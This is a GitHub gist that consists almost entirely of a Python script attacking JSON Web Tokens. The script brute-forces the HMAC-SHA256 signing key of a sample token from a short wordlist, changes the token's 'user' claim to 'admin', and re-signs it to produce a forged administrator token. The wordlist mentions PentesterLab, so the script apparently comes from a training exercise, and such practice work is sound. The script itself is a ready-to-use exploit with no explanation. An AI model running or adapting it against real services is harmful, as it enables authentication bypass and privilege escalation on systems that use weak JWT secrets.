Skip to content

Instantly share code, notes, and snippets.

@1dayluo
Created November 24, 2022 14:56
Show Gist options
  • Save 1dayluo/3856362f19c29266b8e56182cd65a23c to your computer and use it in GitHub Desktop.
Save 1dayluo/3856362f19c29266b8e56182cd65a23c to your computer and use it in GitHub Desktop.
import base64
import hmac
import hashlib
import json
jwt = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjpudWxsfQ.Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM'
def change_payload(jwt):
payload = jwt.split('.')[1]
orgin_p = json.loads(base64.b64decode(payload+'==').decode('utf-8'))
orgin_p['user']='admin'
changed_p = base64.b64encode(json.dumps(orgin_p).rstrip('=').encode('utf-8'))
return changed_p
def brute_sig(key,object):
new_sign = hmac.new(key, object, hashlib.sha256).digest()
return base64.urlsafe_b64encode(new_sign).decode('utf-8').rstrip('=')
header = jwt.split('.')[0]
payload = change_payload(jwt)
origin_sign = jwt.split('.')[-1]
brute_keys = ['hacker','jwt','insecurity','pentesterlab','hacking']
for try_key in brute_keys:
target = ".".join(jwt.split('.')[:-1])
key = try_key.encode('utf-8')
if brute_sig(key, target.encode('utf-8')) == origin_sign:
print('[*]Brute sucess,the key is {}'.format(try_key))
new_target = "{}.{}".format(header.rstrip('='),payload.decode('utf-8').rstrip('='))
jwt = new_target + '.' + brute_sig(key, new_target.encode('utf-8')).rstrip('=')
print('[*]new jwt is: {}'.format(jwt))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment